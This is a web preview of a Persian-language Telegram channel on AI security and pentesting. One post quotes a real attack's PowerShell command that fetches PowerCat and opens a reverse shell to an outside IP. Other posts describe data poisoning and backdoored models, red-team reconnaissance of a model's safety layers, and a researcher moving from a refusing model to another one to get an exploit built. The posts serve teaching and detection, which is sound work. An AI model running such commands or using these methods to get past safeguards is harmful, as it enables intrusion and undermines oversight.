TGViewer
Channel Public Channel
TryHackBox ( AI Security )

TryHackBox ( AI Security )

@aithb

تمام مطالب منتشر شده در کانال صرفاً برای اهداف آموزشی و اطلاع‌رسانی هستند.

هوش مصنوعی مغز دوم نیست، وقتی از مغز اصلی خود استفاده نمی‌کنید
https://t.me/TryHackBox/3018
Subscribers
1.51K
Photos
91
Videos
7
Links
114
Recent Posts 19 shown
Post #396 44

Forwarded from Try Hack Box

TryHackBox CTF 1.zip26.5 KB
TryHackBox #CTF #1
سطح : خیلی آسان
یه چالش امنیت سایبری آماده کردیم! دو فایل زیر رو دانلود کنید و فلگ رو پیدا کنید 👇

/ TryHackBox CTF 1.Zip
|
| __ tryhackbox_challenge.png
|_ _ challenge.zip

راهنمای چالش:

۱. فایل challenge.zip رمزدار هست.
۲. رمز داخل فایل tryhackbox_challenge.png هست دقت کنید که همه‌ چیز تو یه عکس همیشه فقط ظاهرش نیست .
۳. وقتی زیپ رو باز کردید، داخلش یه متن هست که هنوز فلگ نهایی نیست یه مرحله دیکد دیگه لازمه.
فرمت فلگ:
TryHackBox{...}


ارسال فلگ به :
@Unique_exploitbot

#CTF #TryHackBox #CyberSecurity

@TryHackBox
Post #395 86
🎯 Resource Development در AI Red Team: نقشه‌ی دقیق روی MITRE ATLAS**

1. 🎯 Resource Development اولین تاکتیک واقعی زنجیره‌ی ATLAS است؛ پیش از هر Reconnaissance، مهاجم باید ابزار، زیرساخت، و هویت بسازد.
2. 📦 AML.T0002 — Acquire Public AI Artifacts: دانلود dataset و model checkpoint از HuggingFace Hub یا bucket‌های باز، بدون هیچ تعامل مستقیم با هدف.
3. 🗂️ AML.T0002.000: کپی corpus‌های عمومی (Common Crawl، The Pile) برای ساخت یک surrogate model محلی جهت تست offline حمله.
4. 🧬 AML.T0002.001: دانلود یک checkpoint متن‌باز هم‌خانواده با هدف (مثلاً Qwen یا Llama) برای دسترسی white-box پیش از حمله‌ی واقعی.
5. ☁️ AML.T0008 — Acquire Infrastructure: اجاره‌ی GPU cloud، معمولاً با هویت یا پرداخت غیرقابل‌ردیابی، برای fine-tuning یا بهینه‌سازی gradient-based.
6. 🌐 نسخه‌ی کم‌هزینه‌ی همین تکنیک: سوءاستفاده از compute رایگان Google Colab یا Kaggle به‌جای اجاره‌ی مستقیم زیرساخت.
7. 🛠️ AML.T0016 — Obtain Capabilities: تهیه‌ی framework‌های آماده‌ی adversarial ML (مثل ART یا CleverHans) بدون نوشتن کد از صفر.
8. 🧰 AML.T0016.001: استفاده از ابزار automation عمومی (مثل PyRIT) برای تولید انبوه پرامپت‌های adversarial با کمترین تلاش دستی.
9. ⚙️ AML.T0017 — Develop Capabilities: نوشتن اختصاصی optimizer از کلاس GCG وقتی ابزار آماده برای هدف خاص کافی نیست.
10. 💉 AML.T0017.000: طراحی حمله‌ی سفارشی برای دور زدن دقیقاً همان safety classifier‌ای که هدف در production استفاده می‌کند.
11. 👤 AML.T0021 — Establish Accounts: ساخت حساب با هویت ظاهری معتبر روی HuggingFace یا GitHub برای انتشار بی‌ریسک artifact بعدی.
12. ☣️ AML.T0019 — Publish Poisoned Datasets: انتشار dataset ظاهراً تمیز با چند نمونه‌ی trigger مخفی، پیش از crawl شدن توسط پایپ‌لاین‌های آموزشی آینده.
13. 🎭 AML.T0058 — Publish Poisoned Models: انتشار یک LoRA adapter backdoor‌شده با ادعای بهبود benchmark، دقیقاً روی همان رجیستری‌های عمومی.
14. 👻 AML.T0060 — Publish Hallucinated Entities: ثبت‌نام پکیجی که مدل‌های زبانی معمولاً hallucinate می‌کنند — تکنیکی شناخته‌شده با نام slopsquatting.
15. 🔗 خروجی T0016/T0017 مستقیماً ورودی تاکتیک بعدی یعنی ML Attack Staging می‌شود؛ این هفت تکنیک هیچ‌وقت مجزا اجرا نمی‌شوند.
16. 📊 معیار موفقیت این فاز دقت مدل نیست، «نامرئی‌ماندن» است — یک adapter مخرب فقط با عبور از audit اولیه ارزش عملیاتی پیدا می‌کند.
17. 🧩 ترکیب T0002 (دانلود مدل پایه) + T0017 (fine-tuning اختصاصی) دقیقاً همان مسیر متدولوژیک پروژه‌های واقعی backdoor injection است.
18. 💰 آستانه‌ی ورود این فاز به‌شدت پایین است: چند ده دلار GPU و یک حساب رایگان Hub، کل زیرساخت لازم را فراهم می‌کند.
19. 🕵️ سیگنال دفاعی کلیدی: جهش ناگهانی در انتشار adapter/model از حساب‌های تازه‌ساخته با تاریخچه‌ی صفر روی رجیستری‌های عمومی.
20. 🔍 سیگنال دوم: دانلود حجم بالای checkpoint هم‌خانواده (نه خود مدل هدف) از یک IP یا حساب واحد — نشانه‌ی ساخت surrogate برای transfer attack.
21. 🧪 برای تیم قرمز داخلی، شبیه‌سازی کامل همین زنجیره (بدون انتشار واقعی روی رجیستری عمومی) بهترین معیار تست کنترل supply-chain سازمان است.
22. 🏷️ نکته‌ی حیاتی ATLAS: شماره‌ی Technique ID ترتیب نمایش نیست؛ تطبیق کنترل امنیتی باید بر اساس نام دقیق تکنیک انجام شود.
23. 🔄 این فاز چرخه‌ای‌ست نه خطی: یک AML.T0058 موفق (adapter مسموم منتشرشده) خودش ورودی T0002 برای قربانی بعدی می‌شود.
24. 🛡️ دفاع واقعی نه در لایه‌ی مدل، بلکه در لایه‌ی provenance است: امضای رمزنگاری‌شده برای هر artifact دانلودی، پیش از merge با pipeline.
25. ⚖️ Resource Development ارزان‌ترین و کم‌ریسک‌ترین فاز برای مهاجم است — دقیقاً به همین دلیل، ضعیف‌ترین نقطه‌ی نظارتی در اکثر سازمان‌هاست.


@TryHackBox
  • ❤ 1
Post #393 152

Forwarded from Try Hack Box

🧩 گاهی اوقات، مجرمان سایبری تمایل دارند که دستگیر شوند. بیایید یک مثال دیگر و ابزاری را بررسی کنیم که من کمتر در حملات واقعی با آن مواجه شده‌ام.

🔖 طبق این
گزارش، مهاجم از PowerShell برای دانلود و اجرای PowerCat استفاده کرده است

◾ یک ابزار متن‌باز، مشابه Netcat، برای اجرای یک شل معکوس:

powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString (‘hxxps://raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1’); powercat -c 154.17.26[.]41 -p 8080 -e cmd

همانطور که متوجه شدید، مهاجم نام ابزار را تغییر نداده است. و در بسیاری از موارد، این یک رویه رایج است. همین موضوع در مورد مخازن نیز صدق می‌کند.
مجرمان اغلب از PowerShell برای دانلود ابزارها از منابع رسمی استفاده می‌ کنند.

بنابراین، این یک نکته مهم دیگر است که باید مستند شود و در هنگام جستجوی فعال و ایجاد منطق تشخیص، در نظر گرفته شود، به عنوان مثال:
event_type: "processcreatewin"

AND

cmdline: "powercat"

فراموش نکنید که بلوک‌ های اسکریپت نیز حاوی خطوط و توابع جالب زیادی هستند، فقط خود اسکریپت را بررسی کنید.

اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید.

@TryHackBox
@TryHackBoxofficial
@AiTHB
@RadioZeroPod
ASEC Analysis of ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability (CVE-2025-59287) - ASEC Analysis of ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability (CVE-2025-59287) ASEC
Post #390 369
Zero-Trust_AI_Agents_v3.pdf91.9 KB
📌 بررسی امنیتی مدل «Zero Trust» برای عوامل هوش مصنوعی: چک‌لیست، نسخه 3، ژوئن 2026.

@AiTHB
#هوش_مصنوعی #امنیت_سایبری
Post #389 1.15K
Android 1-Day Exploit با کمک LLM

یک سؤال جالب اینجا مطرح می‌شود:
آیا یک LLM می‌تواند فقط با داشتن Patch Diff و توضیح عمومی یک CVE، خودش را به یک 1-day exploit واقعی برساند؟

یک پژوهشگر این موضوع را روی Pixel 6a امتحان کرده و نتیجه، حداقل جالب است.
کار از مقایسه دو نسخه از Google Factory Images شروع شد. مدل binaryها را با هم مقایسه کرد، componentهایی که احتمالاً patch شده بودند را جدا کرد و بعد سراغ reverse engineering رفت.
در ادامه تغییرات function-level با CVEهای منتشرشده تطبیق داده شدند.

یکی از مواردی که بیشتر از بقیه جلب توجه کرد:

CVE-2026-56942
Component: BigWave
Function: ReadTileInfo
Source: vp9hwd_headers.cc

توضیح عمومی CVE به یک Out-of-Bounds Write ناشی از نبودن bounds check اشاره می‌کند.
با بررسی patch، یک تغییر مشخص در کد پیدا شد که احتمالاً همان fix مربوط به آسیب‌پذیری بود.
اینجا کار وارد مرحله جالب‌تری شد.
LLM اول از نوشتن exploit خودداری کرد. اما researcher یافته‌ها و فرضیه‌های به‌دست‌آمده از reverse engineering را به GLM-5.3 منتقل کرد.

نتیجه؟

اGLM-5.3 توانست یک 1-day exploit توسعه دهد که روی یک Pixel 6a واقعی با نسخه آسیب‌پذیر اجرا شد.
هزینه این کار هم کم نبود:

• حدود 12 میلیون
token
• 4492 tool call

• حدود 6 ساعت پردازش
• حدود 38 دلار هزینه
• یک MCP اختصاصی برای reverse engineering

این آزمایش لزوماً به این معنی نیست که LLMها جای exploit developerها را گرفته‌اند.
اما یک چیز را خیلی واضح نشان می‌دهد:

اگر مدل به binary diff، reverse engineering، patch analysis و ابزارهای مناسب دسترسی داشته باشد، می‌تواند بخش قابل‌توجهی از مسیر vulnerability research را خودش جلو ببرد.
شاید سؤال مهم دیگر این نباشد که:
«آیا AI می‌تواند exploit بنویسد؟»
بلکه این باشد:
وقتی مدل‌ها بهتر شوند، تبدیل یک CVE عمومی به یک 1-day واقعی چقدر سریع‌تر و ارزان ‌تر می‌شود؟

@AiTHB
  • ❤ 1
Post #386 340
‏📘 کتاب جامع یادگیری عمیق چندوجهی (Multimodal DL)

‏یادگیری عمیق چندوجهی یکی از کلیدی‌ترین حوزه‌های هوش مصنوعی مدرن است که به مدل‌ها امکان می‌دهد اطلاعات متنی و تصویری را در یک فضای برداری مشترک تحلیل کنند. این کتاب جامع ۲۷۲ صفحه‌ای از دانشگاه LMU مونیخ، راهنمایی عالی برای درک معماری‌های تلفیق زبان و بینایی ماشین است.

‏مهم‌ترین بخش‌های این کتاب عبارتند از:
‏• بررسی دقیق وضعیت فعلی (SOTA) در ابزارهای NLP و بینایی ماشین
‏• معماری‌های چندوجهی کاربردی از جمله Image2Text و Text2Image
‏• نحوه استفاده متقابل از متن و تصویر برای بهبود عملکرد مدل‌ها
‏• مباحث پیشرفته مانند مدل‌های چندمنظوره و هوش مصنوعی مولد در ویدیو

‏این اثر منبعی ارزشمند برای محققانی است که می‌خواهند فراتر از مدل‌های تک‌وجهی حرکت کنند.

@TryHackBox
  • ❤ 3
Post #381 509
🔰 Practical AI Security 🔰
@AiTHB
Post #380 467
Post #379 485
Prioritizing_risks_from_AI.pdf4.5 MB
📌 اولویت‌بندی ریسک‌ های ناشی از هوش مصنوعی

داده‌ها و مواد مربوط به یک مطالعه دلفی سه‌دوره‌ای که توسط طرح "ابتکار عمل ریسک هوش مصنوعی" (MIT AI Risk Initiative) انجام شد، به منظور جمع‌آوری نظرات متخصصان در مورد اولویت‌بندی ریسک‌ های هوش مصنوعی. بیش از 200 متخصص، 24 زیرمجموعه ریسک هوش مصنوعی را از طبقه‌بندی "مخزن ریسک هوش مصنوعی" (AI Risk Repository) در سه بعد ارزیابی کردند: آسیب‌پذیری، مسئولیت و شدت.

@AiTHB
#هوش_مصنوعی
Post #378 330

Forwarded from Try Hack Box

📌 بخشی از دوره Web Penetration Testing Fundamentals

⭕ در این بخش میبینید چگونه یک گزارش حرفه‌ای تست نفوذ تهیه کنیم، یافته‌ ها و ریسک‌ ها رو مستند کنیم و نتیجه تست رو به‌صورت استاندارد به کارفرما ارائه بدیم.
همچنین توضیح داده میشه برای دریافت مدرک دوره در پایان دوره چه مراحلی رو باید طی کنید و چه مواردی در ارزیابی نهایی بررسی میشه.

⭕ دوستان، تصمیم گرفتیم بخشی از محتوای دوره رو به‌ صورت رایگان در اختیار شما قرار بدیم تا قبل از ثبت‌نام، با سبک آموزش و فضای دوره بیشتر آشنا بشید.

⏳ اگر مدت‌ هاست میخواید یادگیری Web Pentesting رو جدی شروع کنید، این فرصت رو از دست ندید.

📚 برای مشاهده سرفصل‌ ها، جزئیات دوره و ثبت‌نام، به اینجا مراجعه کنید.

📩 برای ثبت‌ نام یا دریافت اطلاعات بیشتر:

🆔
@ThbxSupport

@TryHackBox
  • ❤ 1
Post #375 631
Recon Ai Red Team

---

۱) تعریف میدان نبرد
ریکانسانس در AI Red Team یعنی استخراج «نقشهٔ رفتاری» مدل بدون دسترسی به وزن‌ها.
هدف: ساخت Behavioral Surface Map برای تعیین نقاط شکست، نقاط مقاومت، و مسیرهای نفوذ.
این مرحله هیچ‌وقت شامل حمله نیست؛ فقط کشف ساختار تصمیم‌گیری مدل.

---

۲) پروفایل‌سازی مدل (Model Fingerprinting)
- استخراج امضای مدل از روی پاسخ‌ها: سبک، ریجکت‌پترن، bias، safety‑layer، latency، token‑economy.
- تحلیل توزیع پاسخ‌ها با Semantic Embedding بیرونی.
- تعیین کلاس مدل: policy‑heavy، knowledge‑heavy، یا reasoning‑heavy.
- شناسایی «حافظهٔ کوتاه‌مدت» مدل از روی drift پاسخ‌ها.

---

۳) شناسایی لایه‌های دفاعی (Defense Enumeration)
- تشخیص وجود Safety Router از روی الگوهای ریجکت.
- تشخیص Content Filter از روی پاسخ‌های یکنواخت.
- تشخیص Policy Injection از روی جملات ثابت.
- تشخیص Gradient Masking رفتاری از روی پاسخ‌های بی‌ربط.
- تشخیص Semantic Shield از روی تغییر سبک پاسخ در حملات غیرمستقیم.

---

۴) تحلیل بردارهای حمله (Attack Surface Discovery)
- ساخت embedding برای تمام پاسخ‌ها و خوشه‌بندی رفتار.
- تعیین نقاط شکست: خوشه‌هایی که مدل در آن‌ها رفتار غیرخطی نشان می‌دهد.
- تعیین نقاط مقاومت: خوشه‌هایی که مدل در آن‌ها پاسخ‌های ثابت دارد.
- تعیین مسیرهای نفوذ: بردارهایی که مدل در آن‌ها semantic drift دارد.

---

۵) تحلیل پیلود (Payload Intelligence)
- طبقه‌بندی پیلودها بر اساس شدت، جهت، و سطح نفوذ.
- محاسبهٔ Payload Vector Strength با شباهت کسینوسی به خوشه‌های شکست.
- تعیین Payload‑to‑Response Mapping برای پیش‌بینی رفتار مدل.
- ساخت Payload Influence Graph برای دیدن اثر هر پیلود روی رفتار مدل.

---

۶) تحلیل پاسخ (Response Intelligence)
- لیبل‌گذاری پاسخ‌ها: safe / partial / unsafe / refusal.
- محاسبهٔ Response Probability Distribution برای هر نوع حمله.
- تحلیل drift: مقایسهٔ رفتار مدل در حملات مشابه.
- استخراج Behavioral Weak Points از روی پاسخ‌های غیرسازگار.

---

۷) خروجی نهایی ریکانسانس
- Behavioral Surface Map
- Defense Enumeration Report
- Payload Influence Graph
- Weak‑Point Matrix
- Attack‑Surface Blueprint

این خروجی‌ها پایهٔ مرحلهٔ بعدی یعنی Offensive Execution هستند.

@AITHB

#تست_نفوذ
  • ❤ 4
Post #374 511
AI Pentesting Agent
واقعاً چقدر میتواند پنتست کند؟

اگر یک AI Agent بتواند nmap اجرا کند، سرویس‌ها را پیدا کند و چند ابزار امنیتی را پشت سر هم اجرا کند، یعنی واقعاً می‌تواند Pentest انجام دهد؟
نه لزوماً.
چند Benchmark مختلف دقیقاً همین موضوع را بررسی کرده‌اند.
🔹 AutoPenBench
ایجنت‌ها در Recon و اجرای ابزارهای اولیه بد نیستند.
مشکل از جایی شروع می‌شود که باید از بین یافته‌ها تصمیم بگیرند کدام مسیر حمله ارزش پیگیری دارد یا یک Exploit را بسازند و اصلاح کنند.
جالب اینکه وقتی انسان در بعضی مراحل وارد می‌شود، نتیجه خیلی بهتر می‌شود.
🔹 TermiBench
اینجا کار سخت‌تر است.
هدف فقط پیدا کردن یک Flag نیست؛ Agent باید در یک محیط شلوغ، مسیر حمله را پیدا کند و در نهایت به Shell برسد.
سرویس‌های اضافی و خروجی‌های زیاد باعث می‌شوند Agentها خیلی راحت از مسیر اصلی خارج شوند یا نتوانند زنجیره حمله را کامل کنند.
🔹 PentestEval
این Benchmark پنتست را مرحله‌به‌مرحله بررسی می‌کند:
Recon → Attack Decision → Exploit Generation → Exploit Revision → Validation
و یک نکته مهم را نشان می‌دهد:
مشکل اصلی همیشه اجرای ابزار نیست.
قسمت سخت‌تر، تصمیم‌گیری بعد از Recon و تبدیل یک Finding به یک PoC واقعی است.

اگر بخواهیم Agent خودمان را بسازیم؟

به‌جای اینکه یک LLM را به Terminal وصل کنیم و بگوییم «برو پنتست کن»، بهتر است مسیر مشخصی داشته باشیم:
Recon → Weakness Gathering → Attack Decision → Exploit → Validation → Reporting
هر مرحله مسئولیت خودش را داشته باشد و وضعیت کار هم با یک State Machine کنترل شود.
اینطوری اگر Agent شکست خورد، می‌فهمیم کجا مشکل داشته.
مثلاً:
Finding را پیدا کرده، ولی Attack Decision اشتباه بوده؟
یا مسیر درست را انتخاب کرده، ولی نتوانسته PoC را درست کند؟
یا Exploit اجرا شده، ولی Impact را نتوانسته اثبات کند؟


یک Benchmark اختصاصی چطور؟

مثلاً برای Web/API + NoSQL می‌توان برای هر سناریو یک Docker Lab ساخت:
• Web Application
• Database
• چند سرویس اضافی برای ایجاد Noise
• یک Vulnerability مشخص
• یک هدف مشخص
بعد برای هر Challenge چند مرحله تعریف کنیم:
Recon ✓ → Finding ✓ → Decision ✓ → Exploit ✓ → Impact ✓
اینجا دیگر فقط نمی‌گوییم:
❌ Agent موفق شد / نشد
بلکه می‌فهمیم:
Agent دقیقاً کجا کم آورد.

دو حالت برای تست

Autonomous
Agent همه تصمیم‌ها را خودش می‌گیرد.
Human-Assisted
Agent پیشنهاد می‌دهد و انسان در نقاط حساس، مخصوصاً Attack Decision و Exploit، آن را بررسی یا اصلاح می‌کند.
بعد می‌توانیم ببینیم حضور انسان دقیقاً چقدر Performance را بهتر می‌کند.

به نظرم یکی از مهم‌ترین نکات همین است:
مشکل AI Pentesting فعلاً این نیست که Agent نمی‌تواند ابزار اجرا کند.
مشکل اصلی جایی بین این دو اتفاق است:

Tool Output → Understanding → Decision → Exploitation

یعنی Agent باید بفهمد چیزی که پیدا کرده دقیقاً چه معنایی دارد، تصمیم بگیرد ارزش حمله دارد یا نه، و بعد بتواند آن را به یک Attack واقعی تبدیل کند.

همین‌جاست که Benchmarkها واقعاً ارزش پیدا می‌کنند.

چون به‌جای اینکه بگوییم:
«این Agent خیلی خوبه!»
می‌توانیم بگوییم:
در Recon قوی است، در Decision متوسط است و در Exploit Revision ضعیف.
و این خیلی قابل‌اندازه‌گیری‌تر و قابل‌بهبودتر است.

@AITHB
#تست_نفوذ #امنیت_هوش_مصنوعی@AiTHB #هوش_مصنوعی #رد_تیم
  • ❤ 2
  • 👍 1
Post #373 219

Forwarded from Try Hack Box

📌 بخشی از دوره Web Penetration Testing Fundamentals

در این بخش میبینید چطور میتوان یک آسیب‌پذیری SQL Injection را به‌ صورت دستی و بدون استفاده از ابزارهای خودکار شناسایی و بررسی کرد.

⭕ دوستان، تصمیم گرفتیم بخشی از محتوای دوره رو به‌ صورت رایگان در اختیار شما قرار بدیم تا قبل از ثبت‌ نام، با سبک آموزش و فضای دوره بیشتر آشنا بشید.


📚 برای مشاهده سرفصل‌ها، جزئیات دوره و ثبت‌نام، به اینجا مراجعه کنید.

📩 برای ثبت‌ نام یا دریافت اطلاعات بیشتر:

🆔
@ThbxSupport

@TryHackBox
  • ❤ 2
Post #372 437
چقدر به مدل AI اعتماد می‌کنیم، در حالی که شاید مشکل از خود مدل نباشد؛ از داده‌هایی باشد که با آن آموزش دیده؟

یکی از قدیمی‌ ترین اصول امنیت و Machine Learning هنوز پابرجاست:

Garbage In, Garbage Out
اما اگر این «Garbage» عمداً وارد دیتاست شده باشد چه؟

در Data Poisoning، مهاجم داده‌ های training را دستکاری می‌کند تا رفتار مدل را تغییر دهد. به‌طور کلی دو رویکرد مهم وجود دارد:
🔴 Availability Attack

هدف، خراب کردن عملکرد کلی مدل است.
داده‌ها عمداً با نمونه‌های اشتباه، labelهای غلط یا نویز دستکاری می‌شوند تا مدل بعد از آموزش دقت مناسبی نداشته باشد.

این نوع حمله معمولاً در مرحله Testing راحت‌تر خودش را نشان می‌دهد.

🟠 Integrity Attack
اینجا ماجرا جدی‌ تر است.
هدف این نیست که مدل خراب به نظر برسد؛ هدف این است که ظاهراً کاملاً سالم باشد، اما یک رفتار مخفی داخل آن وجود داشته باشد.
مدل می‌تواند روی benchmarkها عملکرد خوبی داشته باشد، اما در صورت مشاهده یک trigger مشخص، رفتار متفاوتی نشان دهد.
این trigger می‌تواند یک الگوی خاص در تصویر، یک token یا عبارت مشخص در ورودی و حتی یک الگوی ظریف در داده باشد.

به همین دلیل، تشخیص چنین حملاتی صرفاً با بررسی Accuracy کافی نیست.

یک نکته مهم برای AI Security

امنیت فقط مربوط به مدل نهایی نیست.
باید کل زنجیره را دید:

Data Source → Dataset → Preprocessing → Training → Model → Deployment

اگر یکی از این مراحل قابل اعتماد نباشد، مدل نهایی هم لزوماً قابل اعتماد نیست.
در این حوزه ابزارهایی مثل TOAN (Text, Object, And Noise) هم برای تحقیقات و Red Teaming روی Data Poisoning معرفی شده‌اند؛ از جمله برای سناریوهای Vision و NLP.

پس وقتی یک مدل با عملکرد فوق‌العاده می‌بینیم، یک سؤال امنیتی مهم هم باید بپرسیم:

داده‌ای که این مدل از آن یاد گرفته، واقعاً چقدر قابل اعتماد است؟

@AiTHB
منبع

#هوش_مصنوعی
Hackernoon The Poison in the Pipeline: Why AI Training Data Is Your Biggest Security Blind Spot TOAN is a toolkit designed to simplify the generation of poisoned datasets for machine learning robustness research.
  • ❤ 3
Post #366 675
llm-for-humans-book.pdf22.8 MB
یه منبع خوب برای یادگیری دنیای LLMها!

اگه دنبال یه منبع نسبتاً جامع و در عین حال ساده برای آشنایی با تکنولوژی‌های کاربردی چند سال اخیر حوزه‌ی AI هستین، LLMs for Humans می‌تونه گزینه‌ی خیلی خوبی باشه.

این کتاب بیشتر برای دولوپرها، تولیدکننده‌های محتوا و کسایی نوشته شده که به هر شکلی با محصولات AI-Powered سروکار دارن.

از موضوعاتی مثل RAG، Agentها، Multimodalها، Context Engineering و کلی مفهوم دیگه صحبت می‌کنه که احتمالاً موقع کار با LLMها، چه به‌عنوان دولوپر و چه حتی کاربر، زیاد بهشون برمی‌خورین.

نکته‌ی خوبش اینه که سعی کرده مفاهیم رو تا جای ممکن ساده و کاربردی توضیح بده؛ یعنی بیشتر روی چیزهایی تمرکز می‌کنه که واقعاً توی پروداکشن به کارتون میان.

یکی از دوستان زحمت کشیده و کتابی با عنوان «مدل‌های زبانی به زبان آدمیزاد» منتشر کرده که سرفصل‌هاش خیلی نزدیک به همین کتابه. نمی‌دونم ترجمه‌ی مستقیمه یا بر اساس همین محتوا نوشته شده، ولی چیزی که دیدم، نسبتاً به‌روزه.

منبع | ریپو | #LLM
@TryHackBox
Post #365 544

Forwarded from رادیو زیرو پاد

📌 برگزاری جلسه ویس چت : 

با درود خدمت دوستان و همراهان عزیز، 
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسه‌ای تخصصی و آموزشی در خصوص تست نفوذ IoT به صورت ویس چت برگزار کنیم.

🎙 مهمان ویژه: 
👤 مهندس : کوشا زنجانی

📅 زمان برگزاری: پنجشنبه 1405/06/12
📍 پلتفرم: گوگل میت
🕗 ساعت : 20:00
🔖  لینک جلسه :
http://meet.google.com/ost-xzfq-yxu
⁉️ موضوعات ما :

◾️بخش اول:
📌 اپیزود ۱ : IoT چیست و چگونه کار می‌کند؟
🔔 نکته مهم: 
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .

➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔
@RadioZeroPod
🆔
@TryHackBox
Older posts →

About this channel

How can I read @aithb without a Telegram account?
TGViewer shows the public web preview Telegram publishes for TryHackBox ( AI Security ): recent posts, photos, videos and the subscriber count, with no app, login or account.
How many subscribers does TryHackBox ( AI Security ) have?
TryHackBox ( AI Security ) (@aithb) has 1.51K subscribers on Telegram, refreshed roughly every 30 minutes.
Does TryHackBox ( AI Security ) know I viewed it here?
No. Public channel previews carry no viewer identity, and TGViewer has no accounts or tracking of what you look up.
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →